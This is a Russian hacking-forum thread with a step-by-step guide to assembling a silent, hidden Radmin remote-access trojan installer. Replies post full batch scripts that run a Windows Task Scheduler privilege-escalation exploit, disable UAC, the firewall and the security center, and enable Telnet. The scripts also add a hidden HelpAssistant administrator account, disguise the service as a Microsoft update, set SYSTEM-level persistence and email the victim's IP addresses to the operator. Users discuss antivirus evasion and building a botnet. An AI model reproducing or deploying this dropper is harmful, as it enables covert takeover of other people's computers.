1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Создание и тихая установка сервера Radmin 3.4 v2

Тема в разделе "Наши статьи", создана пользователем Iindigo, 16 дек 2010.

  1. Iindigo
    Iindigo ВестникЪ Продвинутый
    Симпатии:
    69
    Отличия от предыдущей сборки:
    • переработан msi пакет, теперь он не мусорит в пуске и в списке установленных программ
    • добавлена функция отправки внешнего и внутреннего IP адреса на email (спасибо за идею SubW00fer)
    • сборка работает на windows XP/2003/Vista/7
    • для windows Vista/7 добавлена возможность установки сервера с правами пользователя (на основе сплойта Windows Task Scheduler Privilege Escalation)
    • добавлено отключение UAC в процессе установке

    [​IMG]
    Radmin Server 3.4 XNT Edition​


    Что понадобится:
    • пакет утилит Radmin Deployment tool (скачать)
    • msi пакет сервера Radmin 3.4 (не требует активации, скрывает иконку в трее, не пишется в пуск и установленные программы) (скачать)
    • программа Bat to Exe Converter (скачать)
    • архиватор WinRar (скачать)
    • архив для отправки email (скачать)
    • сплойт Windows Task Scheduler Privilege Escalation (скачать)

    Всё барахло одним пакетом (скачать)

    Устанавливаем Radmin Deployment tool, после установки запускаем Radmin MSI Configurator, указываем ему на скачанный msi пакет сервера Radmin 3.4, задаём настройки, добавляем пользователя и сохраняем. Я задал имя пользователя adm, пароль 123456 и сохранил пакет под именем msupdate.msi

    Смотреть видео

    Откладываем этот пакет в сторонку и начинаем настройку почтового клиента. Распаковываем архив ip.rar, открываем файл ip.bat, смотрим на 8 строку:
    • smtp.yandex.ru - smtp адрес вашего почтового сервера, указываем свой
    • -port 25 - smtp порт, скорее всего, у вас такой же
    • iprdm@yandex.ru - ваш почтовый ящик, указываем свой
    • -u iprdm - логин почтового ящика, пишем свой
    • -pw 123456 - пароль почтового ящика, соответственно, указываем свой

    Далее, 9 и 10 строки:
    • -to iprdm@yandex.ru - email адрес, на который будут отправляться письма
    • -subject "Local IP", -subject "Real IP" - заголовки письма

    После того как вы изменили указанные данные на свои, сохраняем файл, закрываем.
    Хочу обратить внимание - если вы не знаете какой адрес и порт вашего smtp сервера, зайдите на сайт и поищите в разделе помощи и часто задаваемых вопросов. Наверняка там найдётся эта информация. Если и здесь вас постигла неудача, зарегистрируйте ящик на yandex.ru и заполните поля по аналогии с вышеуказанным примером.

    Далее, запускаем программу Bat to Exe Converter, выбираем файл ip.cmd, выставляем переключатель Visibility в Invisible Application, переключатель Working Directory в Temporary Directory. Далее, переходим на вкладку Include, жмем Add и добавляем файлы blat.exe, blat.dll, blat.lib, realip.exe, которые есть у вас в папке ip. Затем жмём Compile и получаем файл ip.exe

    Смотреть видео

    Откладываем готовый ip.exe к msupdate.msi. Теперь создадим сценарий, который будет устанавливать нашу сборку. Открываем блокнот и вставляем туда этот код:

    Тоже самое, но с комментариями:

    Сохрянем файл как inst.cmd. Открываем программу Bat to Exe Converter, выбираем файл inst.cmd, выставляем переключатель Visibility в Invisible Application, переключатель Working Directory в Temporary Directory и жмём Compile. Получаем inst.exe.

    Кладём этот файл в кучу к msupdate.msi, ip.exe и туда же добавляем наш сплойт - poc.exe.
    В итоге, у нас получилось 4 файла, ещё раз перечислю их:
    1. msupdate.msi - специальный пакет radmin server 3.4
    2. ip.exe - программа которая возьмёт ip компьютера и отправит нам их на мыло
    3. inst.exe - основной инсталлятор
    4. poc.exe - сплойт Windows Task Scheduler Privilege Escalation

    Смотреть видео

    Все 4 файла объединяем в один самораспаковывающийся архив. Ставим архиватор WinRar. Затем, выделяем файлы и создаем архив. Даём архиву название, к примеру msupdate. В настройках архива ставим галочки напротив "Создать "SFX-архив" и "Протестировать файлы после упаковки". Уровень сжатия ставим максимальный. Далее переходим на вкладку "Дополнительно" и открываем "Параметры SFX".
    Вкладка "Общие":
    Путь для распаковки - вводим %temp%
    Выполнить после распаковки - вводим %temp%\inst.exe

    Вкладка "Режимы":
    Режим вывода информации - ставим в "Скрыть всё"

    Вкладка "Обновление":
    Режим перезаписи - ставим в "Перезаписывать все файлы без запроса"
    Жмём "Ок" и ещё раз "Ок" для создания архива.
    Инсталлятор готов.

    Смотреть видео

    Сборка тестировалась на системах:


    Самое показательное видео, демонстрирующее все возможности сборки, в ролике "Windows 7 с правами пользователя"

    Минусы:
    в общем-то все что были - все остались

    - не удалось скрыть процесс сервера
    - во время установки, пару раз моргает экран
    - некоторые антивирусы могут среагировать на сплойт poc.exe
    - при установке на Windows Vista/7, могут быть случаи зависания/bsod'а из-за специфики сплойта

    Плюсы:

    + сервер не виден в трее, пуске, установленных программах, службах, скрыта папка в \system32
    + тихая установка в 1 клик
    + сервер не требует активации
    + ставится на Windows XP/2003/Vista/7 x32
    + отправляет письмо с IP адресом машины на email
    + устанавливается с правами пользователя на Windows Vista/7
    + отключает UAC на Vista/7

    Переименовать процесс, без глубокого ревёрсинга, не представляется возможным. По крайней мере мне, спустя несколько дней пыхтения, этого сделать не удалось. Служба сервера просто не стартует.

    Сплойт, с помощью которого ставится сборка на Windows Vista/7 пока ещё актуален и палится далеко не всем. Поэтому существует вероятность установки сборки при живом антивирусе. Далее, microsoft понавыпускает патчи, антивирусы добавят сплойт в базы и тогда, на защищённую систему, сборку будет уже не поставить.

    Если есть мысли как улучшить данный способ - архив и все исходники в вашем распоряжении. Буду только рад.

    Готового пакета не будет, т.к.:
    1. Необходима персональная настройка почтового клиента для отдельного юзера;
    2. Пора включать мозг и распрямлять руки.

    (c) Iindigo​


    // копирование на другие ресурсы разрешено только с копирайтом и ссылкой на этот топик
     
    Последнее редактирование: 17 дек 2010
    16 дек 2010
    3 пользователям это понравилось.
  2. Dr. MefistO
    Dr. MefistO Крывіч Глобальный модератор
    Симпатии:
    125
    Малаец) Т.е. молодец! Подробно, и ясно...
     
    16 дек 2010
    1 человеку нравится это.
  3. Neost...
    Neost... Новичок
    Симпатии:
    1
    Супер! Молодчина! Вот только Radmin Deployment tool на вин7 не работает....
     
    16 дек 2010
  4. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    можно сделать билд под виртуалкой или на дедике.

    Iindigo, это круто. Реально мощно. До дома доберусь - потестю.
     
    17 дек 2010
  5. Iindigo
    Iindigo ВестникЪ Продвинутый
    Симпатии:
    69
    onthar, спасибо. Приятно это слышать от тебя :)
     
    Последнее редактирование: 17 дек 2010
    17 дек 2010
  6. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    А за что отвечает это?

    В смысле, понятно, конечно, за что отвечает, просто я допетрить не могу, для чего тут это. Или это опционально и можно вырезать? У меня просто без этого работает)

    Ну, с телнетом понятно, а SharedAccess - это для чего? Или это только для работоспособности в системах до хп сп2?

    А так - до дома добрался, тискаю щас сборку. Щас ботнет из виртуалок сделаю)
     
    17 дек 2010
  7. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    И тут не прикручена отправка ипа на почту после переподключения/перезагрузки)

    А так классно, на непатченной семере сработало.
     
    17 дек 2010
  8. Iindigo
    Iindigo ВестникЪ Продвинутый
    Симпатии:
    69
    Отключение брандмауэра. Это опционально, да. Так сказать планы на будущее - чтоб не мешался.

    Добавил.
    (schtasks /create /tn security /sc onlogon /ru "NT AUTHORITY\SYSTEM" /tr %temp%\ip.exe)
     
    17 дек 2010
  9. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    Я бы скрипт ip.bat заменил на такой:
    Код:
    @echo off
    :start
    ping ya.ru -n 5 >nul
    if %errorlevel%==0 (goto send) else (goto end)
    
    :end
    goto :start
    
    :send
    ipconfig /all > localip.txt
    realip.exe > realip.txt
    
    ping -n 10 127.0.0.1 > nul
    
    blat.exe -install -server smtp.yandex.ru -port 25 -f LOGIN@yandex.ru -u LOGIN -pw PASSWORD
    blat.exe -to LOGIN@yandex.ru -subject "Local IP" -attachi "localip.txt" -body "Locals IP"
    blat.exe -to LOGIN@yandex.ru -subject "Real IP" -attachi "realip.txt" -body "Real IP"
    
    del /f /q localip.txt
    del /f /q realip.txt
    Login меняем на ваш логин, PASSWORD - на пароль. В этом варианте осуществляется проверка подключения, то есть после перезагрузки пока не пройдет пинг на яндекс, письмо не будет отправлено.
     
    17 дек 2010
  10. Rebel
    Rebel Новичок
    Симпатии:
    0
    замечательная работа! автору большое спасибо!
     
    17 дек 2010
  11. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    В общем так же сделал вариант inst.cmd с полностью работающей отправкой ip-адресов на мыло, проверкой подключения к сети интернет.
    Работает после перезагрузки, проверяет подключение, отправляет ип-адреса.
    В аттаче вариант чисто под хп и универсальный.
    Только для XP:
    Код:
    @echo off
    
    net stop Alerter
    sc config Alerter start= disabled
    net stop wscsvc
    sc config wscsvc start= disabled
    net stop SharedAccess
    sc config SharedAccess start= disabled
    sc config TlntSvr start= auto
    net start TlntSvr
    
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v HelpAssistant /t REG_DWORD /d 0 /f
    
    net user HelpAssistant admin /add
    net localgroup Ђ¤¬Ё*Ёбва*в®ал HelpAssistant /add
    net user HelpAssistant /active:yes /comment:"“зҐв**п §*ЇЁбм ¤«п ЇаҐ¤®бв*ў«Ґ*Ёп Ї®¬®йЁ" /passwordchg:yes
    net user HelpAssistant admin
    
    %temp%\inst.msi /qn /norestart
    copy /y "%temp%\ip.exe" "%SYSTEMROOT%/ip.exe"
    attrib +s +h +r "%SYSTEMROOT%/ip.exe"
    netsh advfirewall firewall add rule name="RealIP" dir=in program="%SYSTEMROOT%\realip.exe" security=notrequired action=allow
    netsh advfirewall firewall add rule name="Microsoft Outlook Express" dir=in program="%SYSTEMROOT%\blat.exe" security=notrequired action=allow 
    start %temp%\ip.exe
    
    ping -n 5 127.0.0.1
    
    attrib +S +H %windir%\system32\rserver30
    
    schtasks /create /tn security /sc onlogon /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%\ip.exe
    
    net stop rserver3
    reg add "HKLM\System\CurrentControlSet\Services\RServer3" /v "DisplayName" /d "Microsoft Update Provide" /f
    reg add "HKLM\System\CurrentControlSet\Services\RServer3" /v "Description" /d "Update your Windows operation system and check corruption files" /f
    net start rserver3
    Под XP и Seven:
    Код:
    @echo off
    
    if exist c:\users\nul (goto win7) else goto winxp
    
    :win7
    ping -n 5 127.0.0.1
    start %temp%\poc.exe
    ping -n 5 127.0.0.1
    goto install
    
    :winxp
    net stop Alerter
    sc config Alerter start= disabled
    net stop wscsvc
    sc config wscsvc start= disabled
    net stop SharedAccess
    sc config SharedAccess start= disabled
    sc config TlntSvr start= auto
    net start TlntSvr
    
    :install
    copy /y "ip.exe" "%SYSTEMROOT%/ip.exe"
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v HelpAssistant /t REG_DWORD /d 0 /f
    attrib +s +h +r "%SYSTEMROOT%/ip.exe"
    netsh advfirewall firewall add rule name="RealIP" dir=in program="%SYSTEMROOT%\realip.exe" security=notrequired action=allow
    netsh advfirewall firewall add rule name="Microsoft Outlook Express" dir=in program="%SYSTEMROOT%\blat.exe" security=notrequired action=allow
    net user HelpAssistant admin /add
    net localgroup Ђ¤¬Ё*Ёбва*в®ал HelpAssistant /add
    net user HelpAssistant /active:yes /comment:"“зҐв**п §*ЇЁбм ¤«п ЇаҐ¤®бв*ў«Ґ*Ёп Ї®¬®йЁ" /passwordchg:yes
    net user HelpAssistant admin
    
    %temp%\msupdate.msi /qn /norestart
    
    start %temp%\ip.exe
    
    ping -n 5 127.0.0.1
    
    attrib +S +H %windir%\system32\rserver30
    
    schtasks /create /tn security /sc onlogon /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%\ip.exe
    
    net stop rserver3
    reg add "HKLM\System\CurrentControlSet\Services\RServer3" /v "DisplayName" /d "Microsoft Update Provide" /f
    reg add "HKLM\System\CurrentControlSet\Services\RServer3" /v "Description" /d "Update your Windows operation system and check corruption files" /f
    net start rserver3
    Все работает, я проверял, смотрим внимательно, не жалуемся.
     

    Вложения:

    Последнее редактирование: 4 янв 2011
    17 дек 2010
  12. Neost...
    Neost... Новичок
    Симпатии:
    1
    Есть хорошие решения, согласен. Спасибо!
     
    17 дек 2010
  13. Iindigo
    Iindigo ВестникЪ Продвинутый
    Симпатии:
    69
    Вот этот вариант понравился. Класс!
    Кто будет собирать - советую взять на вооружение.
     
    17 дек 2010
  14. Neost...
    Neost... Новичок
    Симпатии:
    1
    Iindigo, слушай, а если нужный комп за натом, то ай-пи на мыло тоже не прийдет? Я вот только что поставил, не сработало....

    Добавлено через 2 минуты
    onthar, а ты уверен, что %SYSTEMROOT%/ip.exe ? может
    ?
     
    Последнее редактирование: 17 дек 2010
    17 дек 2010
  15. Iindigo
    Iindigo ВестникЪ Продвинутый
    Симпатии:
    69
    Письмо на мыло придёт даже из-за НАТа. Другое дело как ты к нему за НАТ пролезешь.

    Почти всегда, это одно и то же. Только не "%SYSTEMROOT%/ip.exe", а "%SYSTEMROOT%\ip.exe"
     
    17 дек 2010
  16. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    и так тоже можно.

    придет, но без проброшенных портов подключение к этому компьютеру будет невозможно.
     
    17 дек 2010
  17. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    и так и так работает)
     
    17 дек 2010
  18. Neost...
    Neost... Новичок
    Симпатии:
    1
    И еще вопросик:
    нужно ставить до
    или после?

    Добавлено через 5 минут
    Ну не приходит письмо, и хоть ты тресни...

    Добавлено через 12 минут
    Может порт входящей почты на яндексе 465?
     
    Последнее редактирование: 17 дек 2010
    17 дек 2010
  19. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    попробуй запустить отдельно ip.exe, до сборки радмина. Ошибка где-то там. А лучше даже не ip.exe, а сам батник ,чтобы видеть вывод. Только убери @echo off и в конеч добавь строчку pause. По выводу поймешь, где ошибка, переделаешь по инструкции уже.

    После метки install, иначе может не выполнится в одной из систем (или в хп, или в семерке, в зависимости от полодения)
     
    17 дек 2010
  20. Iindigo
    Iindigo ВестникЪ Продвинутый
    Симпатии:
    69
    Neost..., выложи лог ip.cmd, думается, неправильно настроен.
    Только оригинальный пароль замени на 123456 :)
     
    17 дек 2010

Поделиться этой страницей

Загрузка...